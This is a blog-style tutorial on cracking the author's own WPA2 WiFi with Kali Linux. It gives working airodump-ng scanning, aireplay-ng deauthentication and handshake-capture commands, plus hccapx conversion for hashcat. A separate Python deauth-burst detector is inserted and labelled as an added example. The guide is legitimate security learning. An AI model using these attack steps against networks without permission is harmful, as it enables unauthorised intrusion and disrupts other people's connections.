Ethical Hacking: WPA2 / Kali / ALFA WiFi

Why? I thought you were all about the cloud?

I’ve been in the IT industry for over 15 years in a variety of roles, from my early days in first-line support to my current role as a cloud architect and evangelist. I’ve never really had the opportunity to venture into ethical hacking throughout my career, but it’s an area that’s always appealed to me. I firmly believe that if you have any responsibility for security (we all do), then you should have a firm understanding of the mentality of an attacker. This is a record of my venture into the realm of ethical hacking, in order to create more secure architectures and solutions.

So, I decided to set up a VM on VirtualBox and take my first steps into ethical hacking, starting with my WPA2-protected WiFi. This is a simple start-to-finish guide to getting up and running with Kali and WPA2 hacking.

Step 1: Get Kali Linux

Hopefully, this saves you time and effort in getting started!

To start, grab yourself the latest copy of Kali Linux – it’s a unique “Offensive Security” distribution that comes with most of the tools you will require already installed.

Step 2: Configure and boot the VM

If you’ve opted to use VirtualBox, then plug in your WiFi adaptor and ensure that it is enabled in the USB section of the virtual machine’s settings. I use an Alfa AWUS036ACH, which is a USB 3.0 device – be sure to choose the correct USB controller for your device.

Once you’ve configured your VM, simply boot it up (if you haven’t already) and run the all-important update commands:

apt-get update && apt-get upgrade

Followed by:

apt-get dist-upgrade

Be sure to reboot your VM after these commands.

Step 3: Test your WiFi card

Once the VM is up to date, it’s time to test and start using your WiFi adaptor.

To start, run an iwconfig command; the output will show you whether your WLAN adaptor is recognised. On my VM it’s the only WiFi card, so it shows as wlan0:

Note: many guides talk about using mon0 – my card prefers wlan0, yours may too.

This shows that the WiFi card is recognised within Kali – great news. Next, let’s ensure that monitor mode is available to the card.

Step 4: Test Monitor Mode

Monitor mode allows the WiFi adaptor to listen to all broadcast traffic in the local area:

sudo ip link set wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ip link set wlan0 up

You should see that your card is in Mode: Monitor (as in the screenshot above).

Step 5: Collect information on WiFi networks

Now for the part that feels like you’re starting your ethical hacking journey: scanning for nearby WiFi networks. To get started, type:

For 5 GHz networks (802.11a):

airodump-ng wlan0 --band a

For 2.4 GHz networks (802.11b/g):

airodump-ng wlan0 --band bg

To scan all available network bands:

airodump-ng wlan0 --band abg

Note that the more bands you scan, the longer the scan takes to hop through all available channels.

Step 6: Change to the target network’s channel and perform a deauthentication attack

Now it’s time to zone in on the target network. In this example, I am using my own network, which is currently on channel 36.

root@kali:~# iwconfig wlan0 channel 36 
root@kali:~# airodump-ng -c 36 --bssid 38:D5:47:E2:C3:75 -w cap01.cap wlan0
root@kali:~# aireplay-ng -D -0 2 -a 38:D5:47:E2:C3:75 -c 3C:2E:FF:4A:66:13 wlan0
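
Seen from the defender’s side, the deauthentication step above shows up as a burst of 802.11 deauthentication frames for one BSSID/station pair. The following Python is an added example, not part of the original guide; it assumes frames with the radiotap header already stripped, and the function names, thresholds and sample MAC addresses are constructed for illustration.

```python
import struct
from collections import defaultdict

DEAUTH = 0xC0  # first frame-control byte: version 0, type 0 (management), subtype 12

def mac(b):
    return ":".join(f"{x:02X}" for x in b)

def parse_deauth(frame):
    """Return (dest, src, bssid, reason) for a deauthentication frame, else None."""
    if len(frame) < 26 or frame[0] != DEAUTH:
        return None  # too short for 24-byte header + reason code, or another frame type
    reason = struct.unpack_from("<H", frame, 24)[0]
    return mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def deauth_bursts(frames, window=1.0, threshold=10):
    """frames: (timestamp_seconds, raw 802.11 frame with radiotap already stripped).
    Returns sorted (bssid, station) pairs with >= threshold deauths inside `window` seconds."""
    seen = defaultdict(list)
    for ts, raw in frames:
        parsed = parse_deauth(raw)
        if parsed:
            dest, src, bssid, _ = parsed
            # The frame is addressed either to the station or (as if from it) to the AP.
            station = src if dest == bssid else dest
            seen[(bssid, station)].append(ts)
    flagged = []
    for key, stamps in seen.items():
        stamps.sort()
        start = 0
        for end, t in enumerate(stamps):
            while t - stamps[start] > window:
                start += 1  # slide the window forward
            if end - start + 1 >= threshold:
                flagged.append(key)
                break
    return sorted(flagged)

def build_deauth(dest, src, bssid, reason=7):
    """Build a constructed test frame (not captured traffic)."""
    raw = lambda m: bytes.fromhex(m.replace(":", ""))
    return b"\xc0\x00\x3a\x01" + raw(dest) + raw(src) + raw(bssid) + b"\x00\x00" + struct.pack("<H", reason)

# Constructed sample: locally administered MACs, not real devices.
AP, CLIENT, OTHER = "02:00:00:00:00:01", "02:00:00:00:00:02", "02:00:00:00:00:03"
SAMPLE = [(i * 0.01, build_deauth(CLIENT, AP, AP)) for i in range(32)]
SAMPLE += [(i * 0.01, build_deauth(AP, CLIENT, AP)) for i in range(32)]
SAMPLE += [(5.0, build_deauth(OTHER, AP, AP, reason=3))]  # one ordinary disconnect

if __name__ == "__main__":
    print(deauth_bursts(SAMPLE))
```

Unprotected deauthentication frames carry no authentication, which is why enabling Protected Management Frames (802.11w) on the access point and clients is the usual mitigation.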

Step 7: Convert the capture file to hccapx format for hashcat

/usr/share/hashcat-utils/cap2hccapx.bin cap01.cap-01.cap asus5g.hccapx

Step 8 (Optional): Move the hccapx file from the VM to a more powerful PC (with GPU)

Once I had the capture file, I wanted to brute-force the password as fast as possible. Doing this inside the VirtualBox VM meant that I had to rely purely on the CPU, and seeing as I have a GTX 1080 sitting in the host system, it made sense to move the file to the host. The easiest way of doing this for me was to mount an NFS folder from my NAS and upload the file from the VM to that, then grab the file from my host via SMB.

In order to get NFS up and running on Kali I had to run the following commands:

sudo apt-get install nfs-common

sudo mkdir -p /mnt/nfs/kali

sudo mount myserverip:/volume1/nfs/kali /mnt/nfs/kali

I then copied the hccapx file from my working directory to the newly mounted filesystem:

cp asus5g.hccapx /mnt/nfs/kali

Disclaimer: Ethical hacking is legal – as long as you perform it on your own equipment or have prior permission from the equipment owner. I do not condone wild west WiFi hacking.